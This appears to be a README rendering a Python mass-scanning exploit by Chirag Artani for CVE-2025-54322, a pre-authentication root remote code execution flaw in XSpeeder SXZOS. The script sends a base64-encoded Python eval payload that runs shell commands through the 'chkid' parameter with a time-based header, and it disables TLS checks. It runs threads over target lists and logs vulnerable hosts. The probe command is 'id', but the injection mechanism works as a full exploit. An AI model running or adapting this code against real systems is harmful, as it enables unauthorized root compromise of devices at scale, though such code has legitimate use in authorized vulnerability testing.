README.md
Rendering markdown...
#!/usr/bin/env python3
import requests
import sys
import time
import re
import urllib3
from base64 import b64encode
from requests.packages.urllib3.exceptions import InsecureRequestWarning
from requests.adapters import HTTPAdapter
from urllib3.exceptions import InsecureRequestWarning as URLLib3InsecureWarning
from concurrent.futures import ThreadPoolExecutor, as_completed
from threading import Lock
#By Chirag Artani
# Disable all SSL warnings
# Every request in this file is sent with verify=False, so urllib3's
# InsecureRequestWarning is silenced up front. The warning class is imported
# under two names above and is disabled through both `urllib3` and
# `requests.packages.urllib3`.
# NOTE(review): the three calls look redundant with one another - confirm
# before trimming.
urllib3.disable_warnings(URLLib3InsecureWarning)
urllib3.disable_warnings(InsecureRequestWarning)
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
# Thread-safe locks
# print_lock is held by safe_print() while writing to the console;
# file_lock is held by write_vulnerable() while appending to the results file.
print_lock = Lock()
file_lock = Lock()
def safe_print(message):
    """Print *message* while holding the module-level console lock.

    Worker results are reported from several places; taking ``print_lock``
    keeps a multi-line message from being interleaved with another one.
    """
    print_lock.acquire()
    try:
        print(message)
    finally:
        print_lock.release()
def write_vulnerable(url, output, status):
    """Append one finding to ``vuln-confirm.txt`` under the file lock.

    Args:
        url: Target that was flagged.
        output: Evidence text captured from the response.
        status: Human-readable verdict string.
    """
    # Build the whole record first so the file is touched by a single write.
    record = "".join((
        f"{url}\n",
        f"Status: {status}\n",
        f"Output: {output}\n",
        "-" * 70 + "\n",
    ))
    with file_lock, open('vuln-confirm.txt', 'a') as report:
        report.write(record)
class SSLAdapter(HTTPAdapter):
    """Transport adapter that turns off certificate and hostname checks.

    The pool manager is created with ``cert_reqs='CERT_NONE'`` and
    ``assert_hostname=False``, and with the ``PROTOCOL_TLS`` constant as the
    SSL version.
    """

    def init_poolmanager(self, *args, **kwargs):
        """Create the pool manager with the relaxed TLS settings applied."""
        kwargs.update(
            ssl_version=urllib3.util.ssl_.PROTOCOL_TLS,
            cert_reqs='CERT_NONE',
            assert_hostname=False,
        )
        return super().init_poolmanager(*args, **kwargs)
class XspeederScanner:
    """Check a single target for CVE-2025-54322 using a benign ``id`` probe.

    One instance owns one ``requests.Session``. Call :meth:`close` (or use the
    instance as a context manager) when finished so the session is released.

    Only run this against systems you are explicitly authorized to test.

    Attributes:
        target_url: Base URL of the target with any trailing ``/`` removed.
        max_retries: Number of attempts made by :meth:`check_vulnerability`.
        thread_id: Caller-supplied identifier; stored but not used here.
        session: The ``requests.Session`` used for every request.
    """

    # Matches the start of `id` output, e.g. "uid=0(root) gid=0(root)".
    # Compiled once for the class rather than once per scanned target; still
    # reachable as ``self.id_regex`` on instances.
    id_regex = re.compile(r'uid=\d+\([a-zA-Z0-9_-]+\)\s+gid=\d+\([a-zA-Z0-9_-]+\)')

    # Substrings treated as a hint that the server evaluated the payload.
    # NOTE(review): words such as 'eval' or 'subprocess' (and the bare
    # 'uid=' / 'gid=' check below) can appear in ordinary pages, so the
    # "LIKELY" / "POTENTIALLY" verdicts may be false positives - confirm
    # such findings manually.
    EXECUTION_INDICATORS = (
        'CalledProcessError',
        'subprocess',
        'Traceback',
        'NameError',
        'SyntaxError',
        'eval',
    )

    # Per-request timeout in seconds.
    REQUEST_TIMEOUT = 20

    def __init__(self, target_url, max_retries=2, thread_id=None):
        self.target_url = target_url.rstrip('/')
        self.max_retries = max_retries
        self.thread_id = thread_id
        self.session = self._create_session()

    def __enter__(self):
        return self

    def __exit__(self, exc_type, exc_value, traceback):
        self.close()
        return False

    def close(self):
        """Release the underlying HTTP session, if one was created."""
        session = getattr(self, 'session', None)
        if session is not None:
            session.close()

    def _create_session(self):
        """Create a requests session with SSL bypass"""
        session = requests.Session()
        # Mount custom SSL adapter for both HTTP and HTTPS
        adapter = SSLAdapter()
        session.mount('http://', adapter)
        session.mount('https://', adapter)
        # Set default headers
        session.headers.update({
            'Connection': 'close',
            'Accept': '*/*'
        })
        return session

    def build_payload(self):
        """Return the base64-encoded probe expression for the ``chkid`` parameter.

        The expression runs the ``id`` command and returns its output. The
        trailing ``#sUserCodexsPwd`` marker is kept exactly as found; its
        purpose is not evident from this file.
        """
        cmd = 'id'
        # Use os.system() like original PoC, but capture output
        payload = f'__import__("os").system("{cmd}") or __import__("subprocess").check_output("{cmd}", shell=True).decode() #sUserCodexsPwd'
        encoded_payload = b64encode(payload.encode()).decode("utf-8")
        return encoded_payload

    def calculate_nonce(self):
        """Return the ``X-SXZ-R`` value: the current Unix minute modulo 7, as a string."""
        return str(int(time.time() / 60) % 7)

    def warm_session(self, headers):
        """Request ``/webInfos/`` before the probe.

        The response is not inspected. A timeout is deliberately treated as
        success; any other error is reported as failure.

        Returns:
            True if the request completed or timed out, False otherwise.
        """
        try:
            warmup_url = f"{self.target_url}/webInfos/"
            self.session.get(
                warmup_url,
                headers=headers,
                verify=False,
                timeout=self.REQUEST_TIMEOUT,
                allow_redirects=True
            )
            return True
        except requests.exceptions.Timeout:
            return True
        except Exception:
            return False

    def send_exploit(self, headers, payload):
        """Send the probe request.

        Returns:
            The response object, or None if the request raised.
        """
        try:
            exploit_url = f"{self.target_url}/?title=ABC&oIp=XXX&chkid={payload}"
            response = self.session.get(
                exploit_url,
                headers=headers,
                verify=False,
                timeout=self.REQUEST_TIMEOUT,
                allow_redirects=False
            )
            return response
        except Exception:
            return None

    @staticmethod
    def _failure(status):
        """Build a not-vulnerable result that carries no HTTP status code."""
        return {
            'vulnerable': False,
            'status': status,
            'output': None
        }

    def _classify_response(self, response):
        """Turn a probe response into a result dict (strongest evidence first)."""
        response_text = response.text

        # Full `id` output present.
        id_match = self.id_regex.search(response_text)
        if id_match:
            return {
                'vulnerable': True,
                'status': 'VULNERABLE - RCE Confirmed',
                'output': id_match.group(0),
                'status_code': response.status_code,
                'full_response': response_text[:500]
            }

        # Partial `id` output.
        if 'uid=' in response_text or 'gid=' in response_text:
            return {
                'vulnerable': True,
                'status': 'LIKELY VULNERABLE - Partial match',
                'output': response_text[:200],
                'status_code': response.status_code
            }

        # Error text that suggests the payload was evaluated.
        if any(indicator in response_text for indicator in self.EXECUTION_INDICATORS):
            return {
                'vulnerable': True,
                'status': 'POTENTIALLY VULNERABLE - Code execution indicators found',
                'output': response_text[:300],
                'status_code': response.status_code
            }

        return {
            'vulnerable': False,
            'status': 'Not vulnerable',
            'output': None,
            'status_code': response.status_code
        }

    def _run_attempt(self):
        """Perform one warm-up + probe round and return its result dict."""
        # The nonce is time-based, so it is recomputed for every attempt.
        headers = {
            'User-Agent': 'SXZ/2.3',
            'X-SXZ-R': self.calculate_nonce(),
            'Accept': '*/*'
        }

        # Step 1: Warm up session
        if not self.warm_session(headers):
            return self._failure('Connection completely failed')

        # Small delay between requests
        time.sleep(0.3)

        # Step 2: Send the probe
        response = self.send_exploit(headers, self.build_payload())
        if response is None:
            return self._failure('Exploit delivery failed')

        return self._classify_response(response)

    def check_vulnerability(self):
        """Probe the target, retrying up to ``max_retries`` times.

        A positive result is returned immediately. A negative result or an
        error is retried after a one-second pause until attempts run out, at
        which point the last result is returned.

        Returns:
            dict with at least ``vulnerable`` (bool), ``status`` (str) and
            ``output`` (str or None); ``status_code`` is present whenever a
            probe response was received, and ``full_response`` only on a
            confirmed match.
        """
        for attempt in range(1, self.max_retries + 1):
            try:
                result = self._run_attempt()
            except Exception as e:
                result = self._failure(f'Error: {str(e)[:100]}')

            if result['vulnerable'] or attempt >= self.max_retries:
                return result
            time.sleep(1)

        # Only reached when max_retries < 1 and the loop never ran.
        return self._failure('Max retries exceeded')
def load_targets(filename):
    """Read target URLs from *filename*, one per line.

    Blank lines and comment lines are skipped. A line counts as a comment
    when its first non-whitespace character is ``#``, so indented comments
    are ignored too.

    Args:
        filename: Path of the targets file.

    Returns:
        List of stripped, non-empty, non-comment lines in file order.

    Raises:
        SystemExit: with code 1 if the file is missing or cannot be read.
    """
    try:
        with open(filename, 'r') as f:
            # Strip first, then test for '#', so leading whitespace cannot
            # smuggle a comment line into the target list.
            stripped_lines = (line.strip() for line in f)
            return [
                entry for entry in stripped_lines
                if entry and not entry.startswith('#')
            ]
    except FileNotFoundError:
        print(f"[-] Error: File '{filename}' not found")
        sys.exit(1)
    except Exception as e:
        print(f"[-] Error reading file: {e}")
        sys.exit(1)
def scan_target(target, thread_id):
    """Scan a single target (thread worker function).

    Args:
        target: Base URL to check.
        thread_id: Identifier passed through to the scanner.

    Returns:
        Tuple ``(target, result)`` where *result* is the dict produced by
        ``XspeederScanner.check_vulnerability``.
    """
    scanner = XspeederScanner(target, max_retries=2, thread_id=thread_id)
    try:
        result = scanner.check_vulnerability()
    finally:
        # One scanner (and one HTTP session) is created per target; release
        # the session so it does not linger for the rest of the run.
        scanner.session.close()
    return target, result
def print_vulnerable(target, result):
    """Emit a framed console report for one flagged target.

    The report is assembled first and printed with a single ``safe_print``
    call. The HTTP status line is included only when the result carries a
    ``status_code`` key.
    """
    rule = '=' * 70
    lines = [
        f"\n{rule}",
        f"[+] VULNERABLE: {target}",
        f"[+] Status: {result['status']}",
    ]
    if 'status_code' in result:
        lines.append(f"[+] HTTP Status: {result['status_code']}")
    lines += [
        f"[+] Output: {result['output']}",
        f"{rule}\n",
    ]
    safe_print('\n'.join(lines))
def main():
    """Command-line entry point: scan every target in a file and report findings.

    Usage: ``scanner.py <targets_file> [threads]`` (threads 1-50, default 10).
    Flagged hosts are printed and appended to ``vuln-confirm.txt``; a summary
    is printed and appended to the same file at the end.

    Only run this against systems you are explicitly authorized to test.

    Raises:
        SystemExit: with code 1 on bad arguments, an unreadable targets file,
            or an empty target list.
    """
    banner = """
╔═══════════════════════════════════════════════════════════════╗
║ XSpeeder SXZOS (CVE-2025-54322) RCE Scanner ║
║ Pre-Auth Root RCE Vulnerability Checker ║
║ Showing: VULNERABLE HOSTS ONLY ║
╚═══════════════════════════════════════════════════════════════╝
"""
    print(banner)

    if len(sys.argv) < 2 or len(sys.argv) > 3:
        print("[-] Usage: python3 scanner.py <targets_file> [threads]")
        print("[-] Example: python3 scanner.py targets.txt 20")
        print("[-] Default threads: 10")
        sys.exit(1)

    targets_file = sys.argv[1]

    # Validate thread count. A non-numeric value is rejected with the same
    # message as an out-of-range one instead of surfacing as a fatal error.
    max_threads = 10
    if len(sys.argv) == 3:
        try:
            max_threads = int(sys.argv[2])
        except ValueError:
            max_threads = 0
    if max_threads < 1 or max_threads > 50:
        print("[-] Thread count must be between 1 and 50")
        sys.exit(1)

    targets = load_targets(targets_file)
    # Stop before truncating the results file: with nothing to scan, the
    # summary below would otherwise divide by zero.
    if not targets:
        print(f"[-] No targets found in {targets_file}")
        sys.exit(1)

    # Clear the output file
    with open('vuln-confirm.txt', 'w') as f:
        f.write("XSpeeder SXZOS CVE-2025-54322 - Vulnerable Hosts\n")
        f.write(f"Scan started: {time.strftime('%Y-%m-%d %H:%M:%S')}\n")
        f.write("="*70 + "\n\n")

    print(f"[*] Loaded {len(targets)} targets from {targets_file}")
    print(f"[*] Using {max_threads} concurrent threads")
    print("[*] Vulnerable hosts will be saved to: vuln-confirm.txt")
    print("[*] Starting scan...\n")

    vulnerable_count = 0
    processed = 0
    start_time = time.time()

    # Threading with ThreadPoolExecutor
    with ThreadPoolExecutor(max_workers=max_threads) as executor:
        # Submit all tasks
        future_to_target = {
            executor.submit(scan_target, target, i): target
            for i, target in enumerate(targets, 1)
        }
        try:
            # Process completed tasks
            for future in as_completed(future_to_target):
                target = future_to_target[future]
                processed += 1
                try:
                    target_url, result = future.result()
                    # Only print and save if vulnerable
                    if result['vulnerable']:
                        vulnerable_count += 1
                        print_vulnerable(target_url, result)
                        write_vulnerable(target_url, result['output'], result['status'])
                    # Print progress every 50 hosts
                    if processed % 50 == 0:
                        safe_print(f"[*] Progress: {processed}/{len(targets)} | Found: {vulnerable_count} vulnerable")
                except Exception as e:
                    safe_print(f"[!] Error processing {target}: {e}")
        except KeyboardInterrupt:
            safe_print("\n\n[!] Scan interrupted by user. Waiting for active threads to finish...")
            # Drop work that has not started yet; cancel() is a no-op for
            # futures that are already running or finished.
            for pending in future_to_target:
                pending.cancel()
            executor.shutdown(wait=True)

    elapsed_time = time.time() - start_time

    # After an interrupt fewer targets were handled than were loaded, so the
    # statistics are based on what was actually processed (guarding zero).
    success_rate = (vulnerable_count / processed * 100) if processed else 0.0
    average_time = (elapsed_time / processed) if processed else 0.0

    # Final Summary
    print(f"\n{'='*70}")
    print("[*] SCAN COMPLETE")
    print(f"{'='*70}")
    print(f"[*] Total Time: {elapsed_time:.2f} seconds")
    print(f"[*] Total Targets Scanned: {processed}")
    print(f"[*] Vulnerable Hosts Found: {vulnerable_count}")
    print(f"[*] Success Rate: {success_rate:.2f}%")
    print(f"[*] Average Time per Target: {average_time:.2f} seconds")
    print(f"{'='*70}\n")

    if vulnerable_count > 0:
        print("[+] All vulnerable hosts saved to: vuln-confirm.txt")
        print(f"[+] Total vulnerable: {vulnerable_count}/{len(targets)}")
    else:
        print("[-] No vulnerable hosts found")

    # Append summary to file
    with open('vuln-confirm.txt', 'a') as f:
        f.write("\n" + "="*70 + "\n")
        f.write(f"Scan completed: {time.strftime('%Y-%m-%d %H:%M:%S')}\n")
        f.write(f"Total scanned: {processed}\n")
        f.write(f"Vulnerable: {vulnerable_count}\n")
        f.write(f"Time taken: {elapsed_time:.2f} seconds\n")
if __name__ == "__main__":
    # Run the scanner and translate the outcome into a process exit code:
    # Ctrl-C exits 0, any other unexpected exception exits 1. A normal return
    # from main() leaves exit_code unset, and a SystemExit raised inside
    # main() passes through untouched.
    exit_code = None
    try:
        main()
    except KeyboardInterrupt:
        print("\n\n[!] Script terminated by user")
        exit_code = 0
    except Exception as e:
        print(f"\n[!] Fatal error: {e}")
        exit_code = 1
    if exit_code is not None:
        sys.exit(exit_code)